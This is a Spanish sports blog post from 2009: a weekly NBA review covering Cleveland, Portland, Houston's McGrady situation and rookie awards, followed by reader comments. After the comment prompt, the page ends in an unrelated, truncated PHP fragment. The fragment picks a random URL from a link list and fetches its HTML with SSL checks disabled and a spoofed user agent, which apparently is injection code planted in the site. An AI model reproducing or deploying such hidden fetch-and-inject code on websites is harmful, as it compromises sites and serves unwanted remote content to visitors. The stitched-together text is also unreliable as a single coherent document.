Informe Semanal #9

28 de December de 2009 por txusma

¿Porqué todos los jugones sonríen igual?

No sé si Lebron James entra en la categoría de “Jugón” (yo más bien lo metería en la de “Fuerza de la Naturaleza”) pero lo que está claro es que una vez acabada la semana debe tener una sonrisa de oreja a oreja. No sólo Cleveland ha ganado sus 4 partidos de la semana sino que lo ha hecho con suficiencia y frente rivales del grupo alto. Su victoria en el Staples frente los Lakers ha sido todo un golpe de autoridad y poco a poco y sin hacer mucho ruído están a un paso del liderato de la liga.

Otros que han de estar muy orgullosos de su semana son los Blazers que a pesar de las lesiones que arrastran (recordemos: Oden, Rudy, Outlaw, Batum, Pryzbilla, Mills) han sido capaces de vencer a rivales de la talla de Dallas, San Antonio y Denver. El triunfo de la épica.

Heat y Raptors son los otros equipos que acaban impolutos la semana. Los primeros masacraron la pasada madrugada a los Pacers y y se afianzan como líderes del pelotón perseguidor en el Este mientras que los canadienses han vencido en su doble duelo con los Pistons y salen reforzados de cara a su lucha por entrar en los Playoffs.

Ganarás el pan con el sudor de tu frente

No es lo mismo ser que estar y no es lo mismo perder un partido si eres los Lakers o los Wolves. Los angelinos acaban la semana con una derrota, pero vaya derrota. Algo parecido le pasa a los Celtics que tras ganar a Orlando en un partido infame, tropezaron ayer, de manera sorprendente, con los Clippers. Atlanta, Dallas, San Antonio y Orlando son los otros equipos del grupo cabecero que consiguieron terminar la semana en positivo.

Como decíamos anteriormente, Minnesota termina la semana con 2 victorias y es que desde la vuelta de Kevin Love las cosas pintan diferente y miran el futuro con algo más de optimismo. Al menos para no acabar como el segundo peor equipo de la competición. Washington y Oklahoma también consiguen un buen balance y siguen soñando con los Playoffs.

Se dejaban llevar

Ha vuelto Tracy McGrady y las cosas en Houston parecen empeorar en lugar de mejorar y es que no hay nada como una estrella venida a menos para dinamitar los cimientos de un buen equipo. El ex de Orlando ya ha mostrado su disgusto por los pocos minutos que disfruta y no nos extrañaría que fuera traspasado antes de la fecha límite para traspasos. En New Orleans tampoco están para tirar cohetes y les costará Dios y ayuda llegar a la post-temporada. Uno de los equipos que se lo pondrá más difícil son sus inmediatos perseguidores, los Grizzlies, por los que nadie daba un duro a principio de temporada pero que cuentan con un Zach Randolph en auténtico estado de gracia. Los Bobcats también acaban la semana en empate. Felicidad para Larry Brown.

Malos tiempos para la lírica

Chauncey Billups es fundamental en Denver y cualquier posibilidad de hacer algo grande para por sus manos. Más vale que lo cuíden para que no se pierda más partidos. En Chicago ha sido volver Tyrus Thomas y ganar. No queremos colocar al joven ala-pívot al nivel de Billups, pero a su manera, también es fundamental en los esquemas de la franquicia de la ciudad del viento. Veremos como les van las cosas a partir de ahora.

En Utah y Phoenix las cosas han ido igual de mal esta semana pero no parece que la recuperación de ningún jugador vaya a solucionarlo a corto plazo. Suponemos que se trata de un tropiezo aunque en Salt Lake City hay algo que no acaba de arrancar.

Bucks y Kings continúan al mismo nivel: el que marcan sus increíbles rookies. Esta semana han estado un pelín más flojos y ambas franquicias acaban en negativo. Eso sí, en la carrera por el RoY diríamos que Evans ya ha adelantado a Jennings. Carrera para la que casi descartamos a Blake Griffin y es que entre que parece que le faltará tiempo y que el nivel de los anteriores nombrados es altísimo, nos da que no podrá inmiscuirse en la elección. De todas maneras su equipo lo espera como agua de mayo… Así que podríamos decir que los Clippers tiene alguna esperanza. Que les pregunten a los Warriors que esperan ellos. ¿Quo Vadis Nelson?

El Carabasas Club

Después de 30 partidos los Nets tan solo han conseguido 2 victorias y seguro que les quedan muchas semanas por aparecer en lo más hondo del informe semanal. Philadelphia se ha convertido en un compañero habitual e incluso Indiana desde la lesión de Danny Granger. Lo que sorprende más es encontrarnos a Detroit. Es de suponer que con la recuperación de Gordon, Hamilton y Prince han de tirar para arriba una vez demostrado que Charlie Villanueva es un auténtico bluff.

PREMIOS SEMANALES

¿Qué has hecho tú que no hayamos hecho los demás?

El gran triunfador de la semana ha sido King James que, parece que nos oyó rajar de él recientemente y ha querido dejarnos en evidencia. 29’5 ptos, casi 8 rebotes y más de 7 asistencias y un robo en estos últimos 4 partidos, con la conocida por todos paliza a los Lakers en el Staples. Los Cavs pasan a Orlando y le soplan el cogote a los Celtics, en el peor momento de los verdes de toda la temporada.

Al salir de clase

Con Jennings y los Bucks algo apagados, el pulso de los novatos lo marca Tyreke Evans. Colectivamente los resultados no han acompañado demasiado pero ponérselos de corbata a LeBron y a Kobe en la misma semana está al alcance de muy pocos humanos.

La vida puede ser maravillosa

No sabemos qué es lo que nos sorprende más: Si el hecho de que Vinnie Del Negro todavía conserva el el puesto o lo de que su equipo, con un balance de 11 victorias y 17 derrotas, se mantenga en plaza de playoffs. Se dice, se comenta, se rumorea que como mínimo una de estas dos afirmaciones pasará a ser falsa próximamente.

Cortocircuitos S.L.

A Adelman se le incendia el vestuario. Tracy McGrady no aguanta más su situación y el lío parece coincidir con el bajón de nivel de Ariza. ¿Está manejando bien la situación el técnico o era un problema inevitable? Lo lamentamos por T-Mac. Tambén veremos si se le juzga con el mismo rasero que a AI.

Comenta

9 comentarios a esta entrada

  1. arivas dice:
    #1

    La verdad que el caso T-Mac es complicado. El equipo sin él está respondiendo y no parece fácil que tenga los minutos que quiere, pero a pesar de ser un apetecible expiring yo no veo tan fácil su salida, no se me ocurre asi de primeras ningun trade que cuadre porque Houston supongo que buscaría algun jugador importante.
    ¿Hay algun rumor consistente? ¿Qué se os ocurre a vosotros?

      Citar

  2. sergio dice:
    #2

    Quizas el MVP podria estar compartido con Z. Randolph por aquello de que aparecera poquito en la clasificacion. No creia que volveria a jugar a ese nivel la verdad.

    A Houston le hace falta desprenderse de McGrady pero dudo que encuentren a alguien que ofrezca lo que ellos necesitan. Houston anda como loco por un pivot y con la cantidad de pivots lesionados que hay ahora mismo (Oden, Turiaf, Biedrins, Pryzbilla,….) dudo que puedan establecer conversaciones mas alla de Clippers y Minnesota. Quizas Jefferson o Camby mas otro jugador fuera algo medianamente posible, aunque esta claro que esto no es un supermercado a la carta… He leido incluso cambios por Shaq/Ilgauskas y Bynum/Odom pero me parecen mas bien tonterias.

    Lo de esta semana de los Blazers ha sido como lo de Houston durante la temporada… demosle su merecido reconocimiento (Denise lo agradecera)

    En cuanto al ROY…. otro que no acierto en la Megaporra aunq desde que puse a los Nets en Playoffs no tengo la mas minima ilusion (me centrare en el Trivial jajaja)

      Citar

  3. the answer dice:
    #3

    Mirar mi exclusiva!!!!!!!!!

      Citar

  4. Hynreck dice:
    #4

    Bueno, a mi me parece que no hablamos de lo mismo cuando decimos que los Rockets no necesitan a McGrady, no se, debe ser que vienen de ganar 3 anillos seguidos y tienen una media de edad de 23 años con lo que el futuro de la franquicia esta asegurada…
    Para ser un equipo mediocre como son (mediocre=nivel medio), pues sí, no necesitan refuerzos, pero si ese es el nivel que se autoexigen van de culo. Para cualquier otro objetivo cualquier refuerzo debe ser bienvenido, llámese McGrady, Yao, o Mutombo….

      Citar

  5. CAMPO2 dice:
    #5

    Y por navidad llego Baron Davis, vaya partidazo

    En el caso McGrady creo que podrian cambiarlo por Curry y Robinson de NYK, ganarian un pivot y un anotador compulsivo y los Knicks a T-Mac con su expiring.

    Lo que ya no se si cuadran los salarios y habria que meter a algun pelagatos de por medio

      Citar

  6. sergio dice:
    #6

    Pues seguramente cuadren porque lo de Curry es un desperdicio de los mas grandes de la historia.

    Cuando digo que no necesitan a T-Mac es porque no mejora lo presente y puede crear problemas de vestuario. Aparte, puedes recibir buenos jugadores a cambio para convertirte, con un hipotetico retorno de Yao, en un aspirante al titulo. El año pasado tuvieron contra las cuerdas a los Lakers sin ir mas lejos, y eso no es moco de pavo que digamos. De hecho, incluso guardarse a T-Mac como expiring y librarse de casi 20 millones de salario (lo digo sin saber… pero por ahi estara) para el año que viene son buenas noticias para una franquicia que a principio de año con las lesiones de Yao y T-Mac no pensaba ni entrar en Playoffs (van 7º por delante de Utah). Hagan lo que hagan no pasaran de un equipo mediocre=equipo medio que entre en Playoffs a base de testiculina… Es decir, que dudo mucho que les vayan a cambiar a McGrady por otro jugadorazo…

      Citar

  7. Love Denise dice:
    #7

    Un técnico que para mí tiene mucho mérito lo que está haciendo es Spoelstra. Me justa el juego que desarrollan los Heat a pesar de tener una plantilla que deja bastante que desear, valoro cómo está manejando el vestuario, supongo que no será fácil tener contento a gente como Jermaine, Beasley, Chalmers o Quentin, y me parece que acierta en las rotaciones. Yo creía que no iban a entrar en PO y si siguen así, se calsificaran con la gorra. También es verdad que el nivel del Este es deprimente.

    Si algúna persona que trabaje en los deportes de CUATRO lee este blog, por favor, o contraten redactores y/o presentadores profesionales, ó dediquense a hablar 100% de lo que os gusta (Madrid y BArcelona de fútbol). Es una absoluta verguenza que para 30 seg que le dedican a la NBA (las 3 mejores canastas), se informe erroneamente, no hay un día en que no se equivoquen. Hoy mismo, confundieron la canasta de Joel Anthony con la de Baron Davis. Para emitir esta basura, mejor hablen integramente de fútbol.

      Citar

  8. Txusma dice:
    #8

    Vaya canastón de Baron Davis, madre mía!!

      Citar

  9. TheDeerHunter dice:
    #9

    muy buena broma, The amswer, por cierto… pero no coló XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>